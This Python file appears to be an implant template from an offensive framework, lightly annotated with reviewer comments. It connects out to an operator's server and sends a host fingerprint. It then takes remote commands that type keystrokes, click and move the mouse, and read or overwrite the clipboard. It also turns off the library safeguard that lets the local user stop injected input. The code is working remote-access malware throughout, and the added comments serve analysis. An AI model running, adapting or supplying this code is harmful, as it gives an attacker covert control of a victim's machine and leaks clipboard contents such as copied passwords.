lin_injection_payload.py
import socket, pickle, pyautogui, os, clipboard
from platform import platform
from getpass import getuser
from time import sleep
# Template slots. The !!!!! / @@@@@ / ##### / $$$$$ / %%%%% / ^^^^^ tokens are
# not valid Python, so this file is presumably a template whose values are
# substituted before it is run (TODO confirm against the generator).
#   port, ip_addr  - endpoint passed to s.connect() in main()
#   lkey, skey     - two values placed in scout_data; their meaning is not
#                    shown in this file
#   End            - terminator appended to every message and stripped by
#                    recvall()
#   time_to_sleep  - delay, in seconds, between failed connection attempts
port = !!!!!
ip_addr = @@@@@
lkey = #####
End = $$$$$
skey = %%%%%
time_to_sleep = ^^^^^
type_of_scout = 'Input Injector'
# Host fingerprint: OS string, hostname and login name. Each lookup falls back
# to the literal '?????' on any exception, so start-up never fails here.
try:
    operating_sys = platform()
except:
    operating_sys = '?????'
try:
    hostname = socket.gethostname()
except:
    hostname = '?????'
try:
    username = getuser()
except:
    username = '?????'
userinfo = hostname + '/' + username
# Registration record: main() pickles this list and sends it as the first
# message on every new connection. For responders, that first message carries
# the hostname/username pair and the platform() string of the affected host.
scout_data = [skey, lkey, userinfo, type_of_scout, operating_sys]
s = None  # module-level socket handle; assigned in main(), used by inject_input()
# Turns off pyautogui's fail-safe (normally, moving the pointer to a screen
# corner raises an exception and aborts automation), so the person at the
# keyboard cannot interrupt injected input that way.
pyautogui.FAILSAFE = False
# Key names returned by the 'valids' command in inject_input(). The list is
# only joined and sent back; nothing in the visible code checks a requested
# key against it. It appears to mirror pyautogui's own key-name list
# (presumably copied from the library; not verified here).
valid_keys = ['\\t', '\\n', '\\r', ' ', '!', '"', '#', '$', '%', '&', "'", '(',
    ')', '*', '+', ',', '-', '.', '/', '0', '1', '2', '3', '4', '5', '6', '7',
    '8', '9', ':', ';', '<', '=', '>', '?', '@', '[', '\\', ']', '^', '_', '`',
    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',
    'accept', 'add', 'alt', 'altleft', 'altright', 'apps', 'backspace',
    'browserback', 'browserfavorites', 'browserforward', 'browserhome',
    'browserrefresh', 'browsersearch', 'browserstop', 'capslock', 'clear',
    'convert', 'ctrl', 'ctrlleft', 'ctrlright', 'decimal', 'del', 'delete',
    'divide', 'down', 'end', 'enter', 'esc', 'escape', 'execute', 'f1', 'f10',
    'f11', 'f12', 'f13', 'f14', 'f15', 'f16', 'f17', 'f18', 'f19', 'f2', 'f20',
    'f21', 'f22', 'f23', 'f24', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9',
    'final', 'fn', 'hanguel', 'hangul', 'hanja', 'help', 'home', 'insert', 'junja',
    'kana', 'kanji', 'launchapp1', 'launchapp2', 'launchmail',
    'launchmediaselect', 'left', 'modechange', 'multiply', 'nexttrack',
    'nonconvert', 'num0', 'num1', 'num2', 'num3', 'num4', 'num5', 'num6',
    'num7', 'num8', 'num9', 'numlock', 'pagedown', 'pageup', 'pause', 'pgdn',
    'pgup', 'playpause', 'prevtrack', 'print', 'printscreen', 'prntscrn',
    'prtsc', 'prtscr', 'return', 'right', 'scrolllock', 'select', 'separator',
    'shift', 'shiftleft', 'shiftright', 'sleep', 'space', 'stop', 'subtract', 'tab',
    'up', 'volumedown', 'volumemute', 'volumeup', 'win', 'winleft', 'winright', 'yen',
    'command', 'option', 'optionleft', 'optionright']
# Text returned verbatim for the 'help' command in main(). It doubles as an
# inventory of what the remote side can ask this process to do: keyboard and
# mouse injection, clipboard read/write/clear, and screen geometry queries.
# Several entries (banner, clear, local, python, quit, back) have no handler in
# this file; presumably they are handled on the controlling side.
# NOTE(review): the column alignment inside the string was lost on the page;
# the text below is kept exactly as shown.
help_menu = '''\nInput Injector Menu
====================
Global Commands :
banner Display a banner
clear Clear the screen
help Show the help menu
local <shell command> Locally execute a shell command
python Enter the system python interpreter
quit Quit the framework
Connection commands :
disconnect Make the scout disconnect and try to reconnect
terminate Kill the scout process
sleep <seconds> Disconnect the scout and make it sleep for some time
Handler commands :
back Move back to scout handler
Key Injection commands :
pr <key> Press a key
sh <keys separated with spaces> Use a keyboard shortcut
ty <string> Type out a string
valids Show all valid keys to use on target
Mouse Injection commands :
click_left Click the left mouse button
click_right Click the right mouse button
move_to <X cord> <Y cord> Move mouse to XY coordinates on screen
Clipboard commands :
clip_clear Clear clipboard content
clip_dump Show clipboard content
clip_set <string> Edit/set the clipboard content
Screen command :
dimensions Get the dimensions/size of screen in terms of XY
position Get current mouse position on screen in terms of XY coordinates\n'''
def recvall(tar_socket):
    """Read one End-terminated message from tar_socket and return it without End.

    Returns '' when the first recv() yields no data (peer closed the
    connection). Otherwise data is accumulated in chunks of up to 9999 bytes
    until the buffer ends with End; a further read with a 1-second timeout
    then checks whether more data follows before the message is returned.

    NOTE(review): the page lost all indentation. The nesting below is
    reconstructed, with the final `else` read as belonging to
    `if data.endswith(End)` - confirm against the original file.
    """
    tar_socket.settimeout(None)  # block indefinitely for the first chunk
    data = tar_socket.recv(9999)
    if not data:
        return ''
    while True:
        if data.endswith(End):
            try:
                # Terminator seen: wait up to one second for trailing data so
                # that an End marker occurring mid-message is not taken as
                # the end of the message.
                tar_socket.settimeout(1)
                more_data = tar_socket.recv(9999)
                if not more_data:
                    return data[:-len(End)]
                data += more_data
            except (socket.timeout,socket.error):
                # Nothing more arrived: restore blocking mode and return.
                tar_socket.settimeout(None)
                return data[:-len(End)]
        else:
            # No terminator yet: keep reading. An empty recv() result is not
            # checked on this path, so a peer that closes mid-message leaves
            # this loop spinning (visible as sustained CPU use).
            more_data = tar_socket.recv(9999)
            data += more_data
def inject_input(injection_type, arg):
    """Carry out one remote command against the local desktop and reply on `s`.

    injection_type is the command word and arg the remainder of the command
    line (None when absent), as split in main(). Every branch answers over the
    module-level socket `s` with a '[+]' or '[-]' status string followed by End.
    Nothing is returned to the caller.

    Effects on the host, by command: synthetic keystrokes (ty, pr, sh),
    synthetic mouse clicks and pointer moves (click_left, click_right,
    move_to), clipboard read/overwrite/clear (clip_dump, clip_set,
    clip_clear), and screen-size / pointer-position queries (dimensions,
    position). clip_dump sends the clipboard content off the host, which
    matters for triage because clipboards often hold copied credentials.

    NOTE(review): the page lost all indentation; the nesting below is
    reconstructed from the statement order - confirm against the original.
    """
    try:
        if injection_type == 'ty':
            # Type the argument string as a sequence of keystrokes.
            if not arg:
                s.sendall('[-]Supply a key as an arg'+End)
                return
            pyautogui.typewrite(arg)
            s.sendall('[+]Injected typewritten character/s' + End)
        elif injection_type == 'pr':
            # Press and release a single named key.
            if not arg:
                s.sendall('[-]Supply a key as an arg'+End)
                return
            pyautogui.press(arg)
            s.sendall('[+]Injected pressed key' + End)
        elif injection_type == 'sh':
            # Keyboard shortcut: hold each key down in order, then release in
            # reverse order. A single key name is passed to hotkey() instead.
            if not arg:
                s.sendall('[-]Supply a key as an arg'+End)
                return
            if ' ' in arg:
                arg = arg.split(' ')
                for key in arg:
                    pyautogui.keyDown(key)
                for key in reversed(arg):
                    pyautogui.keyUp(key)
                s.sendall('[+]Injected keyboard shortcut' + End)
            else:
                pyautogui.hotkey(arg)
                s.sendall('[+]Injected keyboard shortcut' + End)
        elif injection_type == 'valids':
            # Reply with the key-name list, entries joined by '|/'.
            tar_list = '|/'.join(valid_keys)
            s.sendall(tar_list + End)
        elif injection_type == 'click_left':
            pyautogui.click(button='left')
            s.sendall('[+]Injected left mouse click' + End)
        elif injection_type == 'click_right':
            pyautogui.click(button='right')
            s.sendall('[+]Injected right mouse click' + End)
        elif injection_type == 'move_to':
            # Expects "<x> <y>"; any parsing or movement failure is reported
            # with the same "integers" message because of the bare except.
            if not arg:
                s.sendall('[-]Supply a key as an arg'+End)
                return
            try:
                arg = arg.split(' ')
                cord_one = int(arg[0])
                cord_two = int(arg[1])
                pyautogui.moveTo(x=cord_one, y=cord_two)
                s.sendall('[+]Injected mouse movement' + End)
            except:
                s.sendall('[-]Input X and Y coordinates as integers' + End)
                return
        elif injection_type == 'dimensions':
            dimensions = pyautogui.size()
            dimensions = '[+]Dimensions of screen : ' + str(dimensions[0]) + ' x ' + str(dimensions[1])
            s.sendall(dimensions + End)
        elif injection_type == 'position':
            current = pyautogui.position()
            current = '[+]Current mouse position : ' + str(current[0]) + ' x ' + str(current[1])
            s.sendall(current + End)
        elif injection_type == 'clip_clear':
            # Overwrite the clipboard with an empty string.
            clipboard.copy('')
            s.sendall('[+]Cleared clipboard content' + End)
        elif injection_type == 'clip_dump':
            # Read the clipboard and send its content to the remote side.
            clipboard_data = clipboard.paste()
            if not clipboard_data:
                s.sendall('[+]Clipboard content is empty' + End)
                return
            s.sendall('[+]Dumped content : ' + clipboard_data + End)
        elif injection_type == 'clip_set':
            # Replace the clipboard content with the supplied string.
            if not arg:
                s.sendall('[-]Input a string' + End)
                return
            clipboard.copy(arg)
            s.sendall('[+]Injected cliboard data' + End)
        else:
            s.sendall('[-]Unknown command "' + injection_type + '", run "help" for help menu' + End)
    except Exception as e:
        # Any failure above is reported as text. Unlike the other replies,
        # this one is sent without the End terminator.
        s.sendall('[-]Error injecting keystrokes : ' + str(e))
def main():
    """Connect out to (ip_addr, port), register, then serve commands forever.

    Outer loop: keep trying to connect, sleeping time_to_sleep seconds after
    each failure, then send pickle.dumps(scout_data) + End as the first
    message. Inner loop: read one command with recvall() and dispatch it.
    'disconnect', 'sleep' and socket errors break out to the outer loop, which
    reconnects; 'terminate' ends the process. The function never returns.

    Observable behaviour for detection and response: repeated outbound TCP
    connection attempts to one fixed endpoint at a fixed interval, and a
    pickled record (with the hostname/username pair and OS string) as the
    first bytes after each successful connect.

    String literals are written straight to the socket, which only works
    where str is a byte string - presumably this targets Python 2 (TODO
    confirm).

    NOTE(review): the page lost all indentation; the nesting below is
    reconstructed from the statement order - confirm against the original.
    """
    # shell_type is declared global but never assigned or read in the
    # visible code.
    global s, shell_type
    while True:
        while True:
            try:
                s = socket.socket()
                s.connect((ip_addr, port))
                break
            except:
                # Any failure (refused, unreachable, ...) is swallowed and the
                # attempt is repeated after a fixed delay.
                sleep(time_to_sleep)
                continue
        # Registration message: pickled scout_data followed by the terminator.
        s.sendall(pickle.dumps(scout_data) + End)
        while True:
            try:
                #s.settimeout(None)
                data = recvall(s)
                # First word is the command; the rest, if any, is its argument.
                command = data.split(' ', 1)[0]
                if command == 'help':
                    s.sendall(help_menu+End)
                elif command == 'disconnect':
                    # Acknowledge, wait five seconds, then go back to the
                    # connect loop.
                    s.sendall('[*]Disconnecting...' + End)
                    sleep(5)
                    break
                elif command == 'terminate':
                    # os._exit ends the process immediately with status 1,
                    # without running cleanup handlers.
                    s.sendall('[*]Terminating scout...' + End)
                    os._exit(1)
                elif command == 'sleep':
                    try:
                        sleep_time = int(data.split(' ')[1])
                    except:
                        s.sendall('[-]Please specify an integer as the sleep duration' + End)
                        continue
                    s.sendall('[*]Scout going offline for : ' + str(sleep_time) + ' seconds' + End)
                    # Close the connection, stay silent for sleep_time
                    # seconds (in one-second steps), then reconnect.
                    s.shutdown(1)
                    s.close()
                    for i in range(sleep_time):
                        sleep(1)
                    break
                elif command == 'ping':
                    s.sendall('[+]Scout is alive' + End)
                else:
                    # Everything else is treated as an input-injection command.
                    arg = data.split(' ', 1)
                    if len(arg) > 1:
                        inject_input(command, arg[1])
                    else:
                        inject_input(command, None)
            except (socket.error, socket.timeout):
                # Connection problem: close what can be closed and reconnect.
                try:
                    s.shutdown(1)
                    s.close()
                    break
                except socket.error:
                    break
            except Exception as e:
                # Non-socket failure: report it to the remote side if the
                # socket still works. If `command` was never assigned, the
                # resulting NameError is caught by the bare except below,
                # which closes the socket and reconnects.
                try:
                    if command:
                        s.sendall('[-]Error, last run command : ' + command + '. Error message : ' + str(e) + End)
                    else:
                        s.sendall('[-]Error message : ' + str(e) + End)
                except:
                    s.shutdown(1)
                    s.close()
                    break
# Called unconditionally: there is no `if __name__ == "__main__"` guard, so the
# connect loop starts as soon as this module is executed or imported.
main()